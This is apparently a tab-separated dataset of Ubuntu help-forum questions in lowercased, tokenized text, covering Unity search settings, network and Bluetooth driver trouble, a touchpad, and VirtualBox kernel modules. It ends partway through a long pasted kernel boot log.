389575	how to restore online searches in unity after running commands in fixubuntu	i run commands in fixubuntu.com to get rid of online searches but now i would like them back but ca n't find a way to reactivate them . i tried reinstalling unity-scope-home and unity-lense-applications but it did n't do it . i also run command gsettings reset com.canonical.unity.lenses disabled-scopes and gsettings reset com.canonical.unity.lenses remote-content-search .
389578	wired and wireless both are unclaimed on alienware 18x	i just got my new alienware 18x and i have installed ubunt 12.04 ( 12.04.3 ) on my system . but unfortunately my wired and wireless both are not working . i am posting here output of all the important commands ; i will highly appreciate if someone can help me out . thanks in advance . lspci -nnk | grep -iea3 `` ( network|wireless|ethernet ) '' 09:00.0 ethernet controller [ 0200 ] : atheros communications inc. device [ 1969 : e091 ] ( rev 10 ) subsystem : dell device [ 1028:05ab ] 0a:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5116 pci express card reader [ 10ec:5209 ] ( rev 01 ) subsystem : dell device [ 1028:05ab ] 0b:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:43b1 ] ( rev 03 ) subsystem : azurewave device [ 1a3b:2b23 ] ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:304 errors:0 dropped:0 overruns:0 frame:0 tx packets:304 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:24144 ( 24.1 kb ) tx bytes:24144 ( 24.1 kb ) sudo lshw -c network *-network unclaimed description : ethernet controller product : atheros communications inc. vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:09:00.0 version : 10 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list configuration : latency=0 resources : memory : d3600000-d363ffff ioport:3000 ( size=128 ) *-network unclaimed description : network controller product : broadcom corporation vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 version : 03 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : d3400000-d3407fff memory : d3200000-d33fffff rfkill list all no output ifconfig eth0 up eth0 : error while getting interface flags : no such device ifconfig wlan0 up wlan0 : error while getting interface flags : no such device
389582	bluetooth connection with s3 ?	i bought a rocketfish micro bluetooth adapter ( 2.1 connectivity ) . i run ubuntu 12.04 lts . my phone runs android version 4.1.2 , and the model is samsung-sgh-i747 , kernel version 3.0.31-1300972 . i did n't know what software info was needed , so this is all i could find . when i go to connect the devices , they both ask me to put a passkey into the other device , but do not allow me to input anything . my computer wo n't see the phone until i try to connect to the computer with the phone . also , the installation cd that came with the adapter wo n't work .
389584	touchpad not supporting after installing ubuntu 13.10	i have a lenovo 3430 3000 model laptop . usb mouse is supported by ubuntu , but my touchpad is not supported . for windows , i had to install synaptics driver software to fully support touchpad . is there any such package for ubuntu ?
389587	ca n't start vm in virtual box after upgrade	i just upgraded to 13.10 and now , virtual box would n't let me start my virtual machine anymore . it tells me to execute /etc/init.d/vboxdrv setup but if i do , i get the following : # /etc/init.d/vboxdrv setup * stopping virtualbox kernel modules [ ok ] * uninstalling old virtualbox dkms kernel modules error ! could not locate dkms.conf file . file : does not exist . [ ok ] * trying to register the virtualbox kernel modules using dkms error ! bad return status for module build on kernel : 3.11.0-14-generic ( x86_64 ) consult /var/lib/dkms/vboxhost/4.1.24/build/make.log for more information . * failed , trying without dkms * recompiling virtualbox kernel modules * look at /var/log/vbox-install.log to find out what went wrong root @ regdesktophome : /lib/modules/3.11.0-14-generic/build/include/linux # and in the log file i see : echo > & 2 `` error : kernel configuration is invalid . `` ; \ echo > & 2 `` include/generated/autoconf.h or include/config/auto.conf are missing . `` ; \ echo > & 2 `` run 'make oldconfig & & make prepare ' on kernel src to fix it . `` ; \ how can i get this fixed ? please advise !
389591	bluetooth timed out	i am using a desktop and having bluetooth dongle in a working condition . now the problem is i am having multiple problems at different combination which i had tried . i have been through whole site searching for my problem . tried installing many thing but its all in vain . at present i had installed blueman but it is also not working . result of lsusb bus 002 device 002 : id 0a12:0001 cambridge silicon radio , ltd bluetooth dongle ( hci mode ) bus 002 device 003 : id 04f3:0235 elan microelectronics corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub after installing blueman when i restarted the system there was an error showing like bluetooth timed out exacly before the ubuntu loads . it would be very much appreciated if anyone will help me rather redirecting to any other post as i have been through all related post.thank you . at last now it has stopped to this stage ... . each time i get a different error ... .someone please help me ... another ... this is the syslog file of my system ... .. dec 13 12:12:55 kamil-desktop rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 663 '' x-info= '' http : //www.rsyslog.com '' ] rsyslogd was huped dec 13 12:13:29 kamil-desktop anacron [ 923 ] : job `cron.daily ' terminated ( mailing output ) dec 13 12:13:29 kamil-desktop anacron [ 923 ] : ca n't find sendmail at /usr/sbin/sendmail , not mailing output dec 13 12:13:29 kamil-desktop anacron [ 923 ] : normal exit ( 1 job run ) dec 13 12:17:01 kamil-desktop cron [ 2586 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) dec 13 12:19:18 kamil-desktop kernel : [ 911.909542 ] audit_printk_skb : 15 callbacks suppressed dec 13 12:19:18 kamil-desktop kernel : [ 911.909550 ] type=1400 audit ( 1386917358.697:28 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=796 comm= '' cupsd '' pid=796 comm= '' cupsd '' capability=36 capname= '' block_suspend '' dec 13 13:01:07 kamil-desktop kernel : [ 3420.828023 ] usb 2-1 : new full-speed usb device number 3 using uhci_hcd dec 13 13:01:07 kamil-desktop kernel : [ 3420.982683 ] usb 2-1 : new usb device found , idvendor=0a12 , idproduct=0001 dec 13 13:01:07 kamil-desktop kernel : [ 3420.982691 ] usb 2-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 dec 13 13:01:07 kamil-desktop bluetoothd [ 786 ] : hci dev 0 registered dec 13 13:01:07 kamil-desktop bluetoothd [ 786 ] : listening for hci events on hci0 dec 13 13:01:07 kamil-desktop kernel : [ 3421.029172 ] usbcore : registered new interface driver btusb dec 13 13:01:09 kamil-desktop kernel : [ 3423.108013 ] bluetooth : hci0 command 0x0c12 tx timeout dec 13 13:01:11 kamil-desktop kernel : [ 3425.112027 ] bluetooth : hci0 command 0x0c01 tx timeout dec 13 13:01:13 kamil-desktop kernel : [ 3427.116014 ] bluetooth : hci0 command 0x1002 tx timeout dec 13 13:01:15 kamil-desktop kernel : [ 3429.120023 ] bluetooth : hci0 command 0x0c45 tx timeout dec 13 13:01:27 kamil-desktop bluetoothd [ 2863 ] : ca n't init device hci0 : connection timed out ( 110 ) dec 13 13:08:55 kamil-desktop avahi-daemon [ 794 ] : registering new address record for 2002:1b74:3397 : a:40bb:75ef:1320:8306 on eth0.. dec 13 13:08:55 kamil-desktop avahi-daemon [ 794 ] : registering new address record for 2002:1b74:3397 : a:219 : d1ff : feac : e561 on eth0.. dec 13 13:10:09 kamil-desktop dbus [ 734 ] : [ system ] reloaded configuration dec 13 13:10:58 dbus [ 734 ] : last message repeated 7 times dec 13 13:11:10 kamil-desktop bluetoothd [ 786 ] : hci dev 0 unregistered dec 13 13:11:10 kamil-desktop bluetoothd [ 786 ] : stopping hci0 event socket dec 13 13:11:10 kamil-desktop kernel : [ 4023.704057 ] usb 2-1 : usb disconnect , device number 3 dec 13 13:11:13 kamil-desktop kernel : [ 4026.548024 ] usb 3-1 : new full-speed usb device number 2 using uhci_hcd dec 13 13:11:13 kamil-desktop kernel : [ 4026.907079 ] usb 3-1 : new usb device found , idvendor=0a12 , idproduct=0001 dec 13 13:11:13 kamil-desktop kernel : [ 4026.907086 ] usb 3-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 dec 13 13:11:13 kamil-desktop bluetoothd [ 786 ] : hci dev 0 registered dec 13 13:11:13 kamil-desktop bluetoothd [ 786 ] : listening for hci events on hci0 dec 13 13:11:15 kamil-desktop kernel : [ 4028.944016 ] bluetooth : hci0 command 0x1009 tx timeout dec 13 13:11:17 kamil-desktop kernel : [ 4030.948012 ] bluetooth : hci0 command 0x1005 tx timeout dec 13 13:11:19 kamil-desktop kernel : [ 4032.952022 ] bluetooth : hci0 command 0x0c23 tx timeout dec 13 13:11:21 kamil-desktop kernel : [ 4034.956020 ] bluetooth : hci0 command 0x0c14 tx timeout dec 13 13:11:23 kamil-desktop bluetoothd [ 3529 ] : ca n't init device hci0 : connection timed out ( 110 ) dec 13 13:11:53 kamil-desktop kernel : kernel logging ( proc ) stopped . dec 13 13:11:53 kamil-desktop rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 663 '' x-info= '' http : //www.rsyslog.com '' ] exiting on signal 15 . dec 13 13:12:48 kamil-desktop kernel : imklog 5.8.6 , log source = /proc/kmsg started . dec 13 13:12:48 kamil-desktop rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 664 '' x-info= '' http : //www.rsyslog.com '' ] start dec 13 13:12:48 kamil-desktop rsyslogd : rsyslogd 's groupid changed to 103 dec 13 13:12:48 kamil-desktop rsyslogd : rsyslogd 's userid changed to 101 dec 13 13:12:48 kamil-desktop rsyslogd-2039 : could not open output pipe '/dev/xconsole ' [ try http : //www.rsyslog.com/e/2039 ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] initializing cgroup subsys cpuset dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] initializing cgroup subsys cpu dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] linux version 3.8.0-34-generic ( buildd @ toyol ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 49~precise1-ubuntu smp wed nov 13 18:05:00 utc 2013 ( ubuntu 3.8.0-34.49~precise1-generic 3.8.13.12 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] command line : boot_image=/boot/vmlinuz-3.8.0-34-generic root=uuid=ad695616-caeb-451b-b8bf-707ba6232e39 ro quiet splash vt.handoff=7 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] kernel supported cpus : dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] intel genuineintel dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] amd authenticamd dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] centaur centaurhauls dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] e820 : bios-provided physical ram map : dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] bios-e820 : [ mem 0x0000000000000000-0x000000000008efff ] usable dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] bios-e820 : [ mem 0x000000000008f000-0x000000000009ffff ] reserved dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] bios-e820 : [ mem 0x00000000000e0000-0x00000000000fffff ] reserved dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] bios-e820 : [ mem 0x0000000000100000-0x000000007e5f4fff ] usable dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] bios-e820 : [ mem 0x000000007e5f5000-0x000000007e6d0fff ] acpi nvs dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] bios-e820 : [ mem 0x000000007e6d1000-0x000000007f573fff ] usable dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] bios-e820 : [ mem 0x000000007f574000-0x000000007f57bfff ] reserved dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] bios-e820 : [ mem 0x000000007f57c000-0x000000007f60afff ] usable dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] bios-e820 : [ mem 0x000000007f60b000-0x000000007f60efff ] reserved dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] bios-e820 : [ mem 0x000000007f60f000-0x000000007f6a7fff ] usable dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] bios-e820 : [ mem 0x000000007f6a8000-0x000000007f6e9fff ] acpi nvs dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] bios-e820 : [ mem 0x000000007f6ea000-0x000000007f6edfff ] usable dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] bios-e820 : [ mem 0x000000007f6ee000-0x000000007f6fefff ] acpi data dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] bios-e820 : [ mem 0x000000007f6ff000-0x000000007f6fffff ] usable dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] bios-e820 : [ mem 0x000000007f700000-0x000000007fffffff ] reserved dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] bios-e820 : [ mem 0x00000000fff80000-0x00000000ffffffff ] reserved dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] nx ( execute disable ) protection : active dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] smbios 2.5 present . dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] dmi : /d945gcpe , bios pe94510m.86a.0069.2008.1204.1528 12/04/2008 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] e820 : update [ mem 0x00000000-0x0000ffff ] usable == > reserved dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] e820 : remove [ mem 0x000a0000-0x000fffff ] usable dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] no agp bridge found dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] e820 : last_pfn = 0x7f700 max_arch_pfn = 0x400000000 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] mtrr default type : uncachable dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] mtrr fixed ranges enabled : dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] 00000-9ffff write-back dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] a0000-fffff uncachable dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] mtrr variable ranges enabled : dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] 0 base 000000000 mask f80000000 write-back dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] 1 base 07f800000 mask fff800000 uncachable dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] 2 base 07f700000 mask ffff00000 uncachable dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] 3 disabled dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] 4 disabled dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] 5 disabled dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] 6 disabled dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] 7 disabled dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] x86 pat enabled : cpu 0 , old 0x7040600070406 , new 0x7010600070106 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] original variable mtrrs dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] reg 0 , base : 0gb , range : 2gb , type wb dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] reg 1 , base : 2040mb , range : 8mb , type uc dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] reg 2 , base : 2039mb , range : 1mb , type uc dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] total ram covered : 2039m dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] found optimal setting for mtrr clean up dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] gran_size : 64k chunk_size : 16m num_reg : 3 lose cover ram : 0g dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] new variable mtrrs dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] reg 0 , base : 0gb , range : 2gb , type wb dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] reg 1 , base : 2039mb , range : 1mb , type uc dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] reg 2 , base : 2040mb , range : 8mb , type uc dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] found smp mp-table at [ mem 0x000fe200-0x000fe20f ] mapped at [ ffff8800000fe200 ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] initial memory mapped : [ mem 0x00000000-0x1fffffff ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] base memory trampoline at [ ffff880000089000 ] 89000 size 24576 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] init_memory_mapping : [ mem 0x00000000-0x7f6fffff ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] [ mem 0x00000000-0x7f5fffff ] page 2m dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] [ mem 0x7f600000-0x7f6fffff ] page 4k dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] kernel direct mapping tables up to 0x7f6fffff @ [ mem 0x1fffc000-0x1fffffff ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] ramdisk : [ mem 0x36100000-0x37077fff ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : rsdp 00000000000fe020 00014 ( v00 intel ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : rsdt 000000007f6fd038 00050 ( v01 intel d945gcr 00000045 01000013 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : facp 000000007f6fc000 00074 ( v01 intel d945gcr 00000045 msft 01000013 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : dsdt 000000007f6f8000 03ce6 ( v01 intel d945gcr 00000045 msft 01000013 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : facs 000000007f6a8000 00040 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : apic 000000007f6f7000 00078 ( v01 intel d945gcr 00000045 msft 01000013 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : wddt 000000007f6f6000 00040 ( v01 intel d945gcr 00000045 msft 01000013 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : mcfg 000000007f6f5000 0003c ( v01 intel d945gcr 00000045 msft 01000013 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : asf ! 000000007f6f4000 000a6 ( v32 intel d945gcr 00000045 msft 01000013 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : hpet 000000007f6f3000 00038 ( v01 intel d945gcr 00000045 msft 01000013 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : ssdt 000000007f6f2000 001bc ( v01 intel cpupm 00000045 msft 01000013 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : ssdt 000000007f6f1000 001b7 ( v01 intel cpu0ist 00000045 msft 01000013 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : ssdt 000000007f6f0000 001b7 ( v01 intel cpu1ist 00000045 msft 01000013 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : ssdt 000000007f6ef000 001b7 ( v01 intel cpu2ist 00000045 msft 01000013 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : ssdt 000000007f6ee000 001b7 ( v01 intel cpu3ist 00000045 msft 01000013 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : local apic address 0xfee00000 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] no numa configuration found dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] faking a node at [ mem 0x0000000000000000-0x000000007f6fffff ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] initmem setup node 0 [ mem 0x00000000-0x7f6fffff ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] node_data [ mem 0x7f6a3000-0x7f6a7fff ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] [ ffffea0000000000-ffffea0001ffffff ] pmd - > [ ffff88007c400000-ffff88007e3fffff ] on node 0 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] zone ranges : dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] dma [ mem 0x00010000-0x00ffffff ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] dma32 [ mem 0x01000000-0xffffffff ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] normal empty dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] movable zone start for each node dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] early memory node ranges dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] node 0 : [ mem 0x00010000-0x0008efff ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] node 0 : [ mem 0x00100000-0x7e5f4fff ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] node 0 : [ mem 0x7e6d1000-0x7f573fff ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] node 0 : [ mem 0x7f57c000-0x7f60afff ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] node 0 : [ mem 0x7f60f000-0x7f6a7fff ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] node 0 : [ mem 0x7f6ea000-0x7f6edfff ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] node 0 : [ mem 0x7f6ff000-0x7f6fffff ] dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] on node 0 totalpages : 521540 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] dma zone : 64 pages used for memmap dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] dma zone : 6 pages reserved dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] dma zone : 3897 pages , lifo batch:0 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] dma32 zone : 8092 pages used for memmap dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] dma32 zone : 509481 pages , lifo batch:31 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : pm-timer io port : 0x408 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : local apic address 0xfee00000 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x01 ] lapic_id [ 0x00 ] enabled ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x02 ] lapic_id [ 0x01 ] enabled ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x03 ] lapic_id [ 0x82 ] disabled ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x04 ] lapic_id [ 0x83 ] disabled ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : lapic_nmi ( acpi_id [ 0x01 ] dfl dfl lint [ 0x1 ] ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : lapic_nmi ( acpi_id [ 0x02 ] dfl dfl lint [ 0x1 ] ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : ioapic ( id [ 0x02 ] address [ 0xfec00000 ] gsi_base [ 0 ] ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] ioapic [ 0 ] : apic_id 2 , version 32 , address 0xfec00000 , gsi 0-23 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : int_src_ovr ( bus 0 bus_irq 0 global_irq 2 dfl dfl ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : int_src_ovr ( bus 0 bus_irq 9 global_irq 9 high level ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : irq0 used by override . dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : irq2 used by override . dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : irq9 used by override . dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] using acpi ( madt ) for smp configuration information dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] acpi : hpet id : 0x8086a201 base : 0xfed00000 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] smpboot : allowing 4 cpus , 2 hotplug cpus dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] nr_irqs_gsi : 40 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] pm : registered nosave memory : 000000000008f000 - 00000000000a0000 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] pm : registered nosave memory : 00000000000a0000 - 00000000000e0000 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] pm : registered nosave memory : 00000000000e0000 - 0000000000100000 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] pm : registered nosave memory : 000000007e5f5000 - 000000007e6d1000 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] pm : registered nosave memory : 000000007f574000 - 000000007f57c000 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] pm : registered nosave memory : 000000007f60b000 - 000000007f60f000 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] pm : registered nosave memory : 000000007f6a8000 - 000000007f6ea000 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] pm : registered nosave memory : 000000007f6ee000 - 000000007f6ff000 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] e820 : [ mem 0x80000000-0xfff7ffff ] available for pci devices dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] booting paravirtualized kernel on bare hardware dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] setup_percpu : nr_cpus:256 nr_cpumask_bits:256 nr_cpu_ids:4 nr_node_ids:1 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] percpu : embedded 28 pages/cpu @ ffff88007f200000 s84928 r8192 d21568 u524288 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] pcpu-alloc : s84928 r8192 d21568 u524288 alloc=1*2097152 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] pcpu-alloc : [ 0 ] 0 1 2 3 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] built 1 zonelists in node order , mobility grouping on . total pages : 513378 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] policy zone : dma32 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] kernel command line : boot_image=/boot/vmlinuz-3.8.0-34-generic root=uuid=ad695616-caeb-451b-b8bf-707ba6232e39 ro quiet splash vt.handoff=7 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] pid hash table entries : 4096 ( order : 3 , 32768 bytes ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] __ex_table already sorted , skipping sort dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] checking aperture ... dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] no agp bridge found dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] calgary : detecting calgary via bios ebda area dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] calgary : unable to locate rio grande table in ebda - bailing ! dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] memory : 2021260k/2087936k available ( 7172k kernel code , 1776k absent , 64900k reserved , 6071k data , 1016k init ) dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] slub : genslabs=15 , hwalign=64 , order=0-3 , minobjects=0 , cpus=4 , nodes=1 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] hierarchical rcu implementation . dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] rcu dyntick-idle grace-period acceleration is enabled . dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] rcu restricting cpus from nr_cpus=256 to nr_cpu_ids=4 . dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] nr_irqs:16640 nr_irqs:712 16 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] console : colour dummy device 80x25 dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] console [ tty0 ] enabled dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] allocated 8388608 bytes of page_cgroup dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] please try 'cgroup_disable=memory ' option if you do n't want memory cgroups dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] hpet clockevent registered dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] tsc : fast tsc calibration using pit dec 13 13:12:48 kamil-desktop kernel : [ 0.000000 ] tsc : detected 2194.678 mhz processor dec 13 13:12:48 kamil-desktop kernel : [ 0.004005 ] calibrating delay loop ( skipped ) , value calculated using timer frequency.. 4389.35 bogomips ( lpj=8778712 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.004010 ] pid_max : default : 32768 minimum : 301 dec 13 13:12:48 kamil-desktop kernel : [ 0.004043 ] security framework initialized dec 13 13:12:48 kamil-desktop kernel : [ 0.004063 ] apparmor : apparmor initialized dec 13 13:12:48 kamil-desktop kernel : [ 0.004064 ] yama : becoming mindful . dec 13 13:12:48 kamil-desktop kernel : [ 0.004302 ] dentry cache hash table entries : 262144 ( order : 9 , 2097152 bytes ) dec 13 13:12:48 kamil-desktop kernel : [ 0.005536 ] inode-cache hash table entries : 131072 ( order : 8 , 1048576 bytes ) dec 13 13:12:48 kamil-desktop kernel : [ 0.006226 ] mount-cache hash table entries : 256 dec 13 13:12:48 kamil-desktop kernel : [ 0.006497 ] initializing cgroup subsys cpuacct dec 13 13:12:48 kamil-desktop kernel : [ 0.006502 ] initializing cgroup subsys memory dec 13 13:12:48 kamil-desktop kernel : [ 0.006514 ] initializing cgroup subsys devices dec 13 13:12:48 kamil-desktop kernel : [ 0.006516 ] initializing cgroup subsys freezer dec 13 